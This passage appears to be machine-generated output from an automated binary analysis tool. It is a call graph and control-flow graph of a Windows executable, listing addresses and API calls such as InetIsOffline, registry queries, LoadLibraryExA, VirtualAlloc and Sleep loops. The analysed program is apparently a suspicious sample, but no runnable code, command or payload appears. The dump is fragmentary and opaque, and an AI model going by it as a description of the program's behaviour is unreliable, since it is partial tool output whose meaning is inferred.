28544->28550 28545->28543 28549 2b24500 11 API calls 28545->28549 28551 2b247b3 28545->28551 28547 2b24542 28546->28547 28582 2b22c2c 11 API calls 28546->28582 28547->28516 28548 2b24570 11 API calls 28553 2b247cd 28548->28553 28549->28551 28550->28546 28551->28548 28554 2b24500 11 API calls 28553->28554 28555 2b247f9 28554->28555 28555->28516 28558 2b244d6 28556->28558 28557 2b244fc 28557->28489 28558->28557 28583 2b22c2c 11 API calls 28558->28583 28561 2b24b85 28560->28561 28568 2b24bb5 28560->28568 28563 2b24bae 28561->28563 28565 2b24b91 28561->28565 28571 2b24570 28563->28571 28564 2b24b9f 28564->28539 28570 2b22c44 11 API calls 28565->28570 28576 2b244ac 28568->28576 28569->28539 28570->28564 28572 2b24574 28571->28572 28573 2b24598 28571->28573 28580 2b22c10 11 API calls 28572->28580 28573->28568 28575 2b24581 28575->28568 28577 2b244b2 28576->28577 28578 2b244cd 28576->28578 28577->28578 28581 2b22c2c 11 API calls 28577->28581 28578->28564 28580->28575 28581->28578 28582->28547 28583->28558 28585 2b24500 11 API calls 28584->28585 28586 2b38043 28585->28586 28587 2b37914 12 API calls 28586->28587 28588 2b38050 28587->28588 28589 2b38058 GetModuleHandleA 28588->28589 28590 2b380c8 15 API calls 28589->28590 28591 2b38069 GetModuleHandleA 28590->28591 28592 2b38087 28591->28592 28593 2b244ac 11 API calls 28592->28593 28594 2b37d55 28593->28594 28594->28530 28595->28506 28596 2b4c2fc 28606 2b26518 28596->28606 28600 2b4c32a 28611 2b4bb50 timeSetEvent 28600->28611 28602 2b4c334 28603 2b4c342 GetMessageA 28602->28603 28604 2b4c336 TranslateMessage DispatchMessageA 28603->28604 28605 2b4c352 28603->28605 28604->28603 28607 2b26523 28606->28607 28612 2b24168 28607->28612 28610 2b2427c SysAllocStringLen SysFreeString SysReAllocStringLen 28610->28600 28611->28602 28613 2b241ae 28612->28613 28614 2b24227 28613->28614 28615 2b243b8 28613->28615 28626 2b24100 28614->28626 28617 2b243e9 28615->28617 28621 2b243fa 28615->28621 28631 2b2432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 28617->28631 28620 2b243f3 28620->28621 28622 2b2443f FreeLibrary 28621->28622 28623 2b24463 28621->28623 28622->28621 28624 2b24472 ExitProcess 28623->28624 28625 2b2446c 28623->28625 28625->28624 28627 2b24110 28626->28627 28628 2b24143 28626->28628 28627->28628 28632 2b25814 28627->28632 28636 2b215cc 28627->28636 28628->28610 28631->28620 28633 2b25824 GetModuleFileNameA 28632->28633 28634 2b25840 28632->28634 28640 2b25a78 GetModuleFileNameA RegOpenKeyExA 28633->28640 28634->28627 28659 2b21560 28636->28659 28638 2b215d4 VirtualAlloc 28639 2b215eb 28638->28639 28639->28627 28641 2b25afb 28640->28641 28642 2b25abb RegOpenKeyExA 28640->28642 28658 2b258b4 12 API calls 28641->28658 28642->28641 28643 2b25ad9 RegOpenKeyExA 28642->28643 28643->28641 28645 2b25b84 lstrcpynA GetThreadLocale GetLocaleInfoA 28643->28645 28647 2b25c9e 28645->28647 28650 2b25bbb 28645->28650 28646 2b25b20 RegQueryValueExA 28648 2b25b40 RegQueryValueExA 28646->28648 28652 2b25b5e RegCloseKey 28646->28652 28647->28634 28648->28652 28650->28647 28651 2b25bcb lstrlenA 28650->28651 28653 2b25be3 28651->28653 28652->28634 28653->28647 28654 2b25c30 28653->28654 28655 2b25c08 lstrcpynA LoadLibraryExA 28653->28655 28654->28647 28656 2b25c3a lstrcpynA LoadLibraryExA 28654->28656 28655->28654 28656->28647 28657 2b25c6c lstrcpynA LoadLibraryExA 28656->28657 28657->28647 28658->28646 28660 2b21500 28659->28660 28660->28638 28661 2b21c6c 28662 2b21d04 28661->28662 28663 2b21c7c 28661->28663 28666 2b21f58 28662->28666 28667 2b21d0d 28662->28667 28664 2b21cc0 28663->28664 28665 2b21c89 28663->28665 28668 2b21724 10 API calls 28664->28668 28669 2b21c94 28665->28669 28709 2b21724 28665->28709 28670 2b21fec 28666->28670 28674 2b21f68 28666->28674 28675 2b21fac 28666->28675 28671 2b21d25 28667->28671 28677 2b21e24 28667->28677 28693 2b21cd7 28668->28693 28672 2b21d2c 28671->28672 28679 2b21d48 28671->28679 28683 2b21dfc 28671->28683 28682 2b21724 10 API calls 28674->28682 28681 2b21fb2 28675->28681 28684 2b21724 10 API calls 28675->28684 28676 2b21e7c 28678 2b21724 10 API calls 28676->28678 28695 2b21e95 28676->28695 28677->28676 28686 2b21e55 Sleep 28677->28686 28677->28695 28697 2b21f2c 28678->28697 28687 2b21d79 Sleep 28679->28687 28701 2b21d9c 28679->28701 28680 2b21cfd 28694 2b21f82 28682->28694 28688 2b21724 10 API calls 28683->28688 28700 2b21fc1 28684->28700 28685 2b21cb9 28686->28676 28690 2b21e6f Sleep 28686->28690 28691 2b21d91 Sleep 28687->28691 28687->28701 28704 2b21e05 28688->28704 28689 2b21fa7 28690->28677 28691->28679 28692 2b21ca1 28692->28685 28733 2b21a8c 28692->28733 28693->28680 28699 2b21a8c 8 API calls 28693->28699 28694->28689 28702 2b21a8c 8 API calls 28694->28702 28697->28695 28703 2b21a8c 8 API calls 28697->28703 28698 2b21e1d 28699->28680 28700->28689 28705 2b21a8c 8 API calls 28700->28705 28702->28689 28706 2b21f50 28703->28706 28704->28698 28707 2b21a8c 8 API calls 28704->28707 28708 2b21fe4 28705->28708 28707->28698 28710 2b21968 28709->28710 28711 2b2173c 28709->28711 28712 2b21938 28710->28712 28713 2b21a80 28710->28713 28722 2b217cb Sleep 28711->28722 28723 2b2174e 28711->28723 28719 2b21947 Sleep 28712->28719 28726 2b21986 28712->28726 28715 2b21684 VirtualAlloc 28713->28715 28716 2b21a89 28713->28716 28714 2b2175d 28714->28692 28717 2b216bf 28715->28717 28718 2b216af 28715->28718 28716->28692 28717->28692 28750 2b21644 28718->28750 28721 2b2195d Sleep 28719->28721 28719->28726 28721->28712 28722->28723 28725 2b217e4 Sleep 28722->28725 28723->28714 28724 2b2182c 28723->28724 28727 2b2180a Sleep 28723->28727 28731 2b215cc VirtualAlloc 28724->28731 28732 2b21838 28724->28732 28725->28711 28729 2b215cc VirtualAlloc 28726->28729 28730 2b219a4 28726->28730 28727->28724 28728 2b21820 Sleep 28727->28728 28728->28723 28729->28730 28730->28692 28731->28732 28732->28692 28734 2b21aa1 28733->28734 28735 2b21b6c 28733->28735 28737 2b21aa7 28734->28737 28740 2b21b13 Sleep 28734->28740 28736 2b216e8 28735->28736 28735->28737 28739 2b21c66 28736->28739 28743 2b21644 2 API calls 28736->28743 28738 2b21ab0 28737->28738 28742 2b21b4b Sleep 28737->28742 28747 2b21b81 28737->28747 28738->28685 28739->28685 28740->28737 28741 2b21b2d Sleep 28740->28741 28741->28734 28744 2b21b61 Sleep 28742->28744 28742->28747 28745 2b216f5 VirtualFree 28743->28745 28744->28737 28746 2b2170d 28745->28746 28746->28685 28748 2b21c00 VirtualFree 28747->28748 28749 2b21ba4 28747->28749 28748->28685 28749->28685 28751 2b21681 28750->28751 28752 2b2164d 28750->28752 28751->28717 28752->28751 28753 2b2164f Sleep 28752->28753 28754 2b21664 28753->28754 28754->28751 28755 2b21668 Sleep 28754->28755 28755->28752

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 2b3ec74-2b3ec77 1 2b3ec7c-2b3ec81 0->1 1->1 2 2b3ec83-2b3ecb5 call 2b3870c call 2b22ee0 call 2b22f08 InetIsOffline 1->2 9 2b3ecb7-2b3ecc6 call 2b24500 2->9 10 2b3ecc8-2b3ecd2 call 2b24500 2->10 14 2b3ecd7-2b3ef9a call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3eb94 9->14 10->14 115 2b3efa0-2b3efa7 call 2b3ebf0 14->115 116 2b4aa2a-2b4afa0 call 2b244d0 * 5 call 2b24c0c call 2b244ac call 2b24c0c call 2b244d0 call 2b244ac call 2b244d0 * 2 call 2b24c0c call 2b244d0 * 2 call 2b244ac call 2b244d0 call 2b244ac call 2b244d0 * 2 call 2b24c0c call 2b244d0 call 2b24c0c call 2b244d0 * 4 call 2b24c0c call 2b244ac call 2b24c0c call 2b244d0 * 2 call 2b244ac call 2b244d0 call 2b24c24 call 2b244d0 call 2b24c24 call 2b244d0 call 2b24c0c call 2b244ac call 2b24c0c call 2b244d0 * 2 call 2b244ac call 2b24c0c call 2b244ac call 2b24c0c call 2b244d0 call 2b24c0c call 2b244ac call 2b24c0c call 2b244d0 call 2b24c0c call 2b244ac call 2b24c0c call 2b244d0 call 2b24c0c call 2b244ac call 2b24c0c call 2b244d0 * 2 call 2b24c0c call 2b244ac call 2b24c0c call 2b244d0 * 2 call 2b244ac call 2b244d0 call 2b25788 call 2b244d0 call 2b244ac call 2b244d0 * 2 call 2b2e37c call 2b244d0 call 2b25e58 call 2b244d0 * 4 call 2b25788 call 2b244d0 call 2b25788 call 2b244d0 call 2b24c0c call 2b244d0 call 2b24c0c call 2b244ac call 2b244d0 call 2b244ac call 2b244d0 call 2b25788 call 2b244d0 call 2b24c0c call 2b244d0 * 4 call 2b244ac call 2b244d0 14->116 115->116 122 2b3efad-2b3f8ce call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b246a4 * 2 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b38954 call 2b2494c call 2b246a4 call 2b3df38 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24798 call 2b27e18 115->122 592 2b3f9e1-2b3faf4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3df38 call 2b24500 122->592 593 2b3f8d4-2b3f9c7 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 122->593 655 2b3faf9-2b3fc21 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2c2ec call 2b24500 592->655 649 2b3f9cc-2b3f9dc call 2b24500 593->649 649->655 688 2b3fc23-2b3fc26 655->688 689 2b3fc28-2b3ffe9 call 2b249ac call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3df38 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2494c call 2b246a4 call 2b27e18 655->689 688->689 800 2b3ffef-2b40444 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24d8c call 2b3dbb0 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e08c call 2b257c4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24500 call 2b3e014 689->800 801 2b407ab-2b40d83 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24d8c call 2b3dbb0 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e08c call 2b257c4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24500 * 2 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e014 689->801 1055 2b41f85-2b42170 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 800->1055 1056 2b4044a-2b407a6 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2494c call 2b24d20 call 2b3dbb0 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 800->1056 801->1055 1187 2b40d89-2b412b8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b27a88 call 2b3e618 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e08c call 2b257c4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 801->1187 1222 2b42175-2b42188 1055->1222 1056->1055 1539 2b412c2-2b414d7 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e2f8 1187->1539 1225 2b4218f-2b42194 1222->1225 1226 2b4218a-2b4218d 1222->1226 1225->116 1229 2b4219a-2b42a44 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b27a88 call 2b3e618 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e5b4 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24734 call 2b3e08c call 2b257c4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24500 * 13 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2494c call 2b246a4 call 2b27e3c 1225->1229 1226->1225 1781 2b42a49-2b42a4b 1229->1781 1661 2b41f72-2b41f7f 1539->1661 1662 2b414dd-2b415e6 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e4b8 1539->1662 1661->1055 1661->1539 1662->1661 1724 2b415ec-2b41663 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 1662->1724 1752 2b41668-2b416d3 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 1724->1752 1776 2b416d8-2b41707 call 2b38824 CoInitialize call 2b2480c 1752->1776 1785 2b4170c-2b41756 call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 1776->1785 1783 2b42be7-2b42cf2 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 1781->1783 1784 2b42a51-2b42be2 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2494c call 2b246a4 call 2b27fd0 1781->1784 1870 2b42cf4-2b42cf7 1783->1870 1871 2b42cf9-2b42f11 call 2b249ac call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24898 1783->1871 1784->1783 1815 2b4175b-2b41762 call 2b38824 1785->1815 1821 2b41767-2b417d2 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 1815->1821 1857 2b417d7-2b417ee call 2b38824 call 2b36d50 1821->1857 1869 2b417f3-2b4186e call 2b32820 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 1857->1869 1911 2b41873-2b4187a call 2b38824 1869->1911 1870->1871 2013 2b42f17-2b43359 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b27e18 1871->2013 2014 2b44c78-2b454ca call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e1d8 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b27a88 call 2b3e618 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3e540 call 2b3e5b4 call 2b24500 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24898 1871->2014 1917 2b4187f-2b418ea call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 1911->1917 1944 2b418ef-2b41913 call 2b38824 call 2b2e384 1917->1944 1952 2b41918-2b41986 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 1944->1952 1976 2b4198b-2b41992 call 2b38824 1952->1976 1980 2b41997-2b41a02 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 1976->1980 2004 2b41a07-2b41a1f call 2b38824 call 2b2e384 1980->2004 2012 2b41a24-2b41a92 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2004->2012 2049 2b41a97-2b41a9e call 2b38824 2012->2049 2378 2b433b6-2b43a65 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b3870c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b37b98 call 2b387a0 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b37b98 call 2b387a0 call 2b3870c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b27e18 2013->2378 2379 2b4335b-2b433b1 call 2b3e198 call 2b24d8c call 2b24734 call 2b24d8c call 2b3dacc 2013->2379 2660 2b454d0-2b45515 call 2b2480c call 2b2494c call 2b246a4 call 2b27e18 2014->2660 2661 2b46cb8-2b46f33 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b38824 call 2b24898 2014->2661 2054 2b41aa3-2b41b0e call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2049->2054 2091 2b41b13-2b41b30 call 2b38824 call 2b2e384 2054->2091 2102 2b41b35-2b41bb3 call 2b31770 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2091->2102 2145 2b41bb8-2b41bbf call 2b38824 2102->2145 2150 2b41bc4-2b41c2f call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2145->2150 2187 2b41c34-2b41c61 call 2b38824 CoUninitialize call 2b2480c 2150->2187 2198 2b41c66-2b41cb0 call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2187->2198 2228 2b41cb5-2b41cbc call 2b38824 2198->2228 2235 2b41cc1-2b41d2c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 2228->2235 2270 2b41d31-2b41d38 call 2b38824 2235->2270 2276 2b41d3d-2b41d50 2270->2276 2280 2b41d57-2b41d5c 2276->2280 2281 2b41d52-2b41d55 2276->2281 2280->1661 2284 2b41d62-2b41dcd call 2b2480c 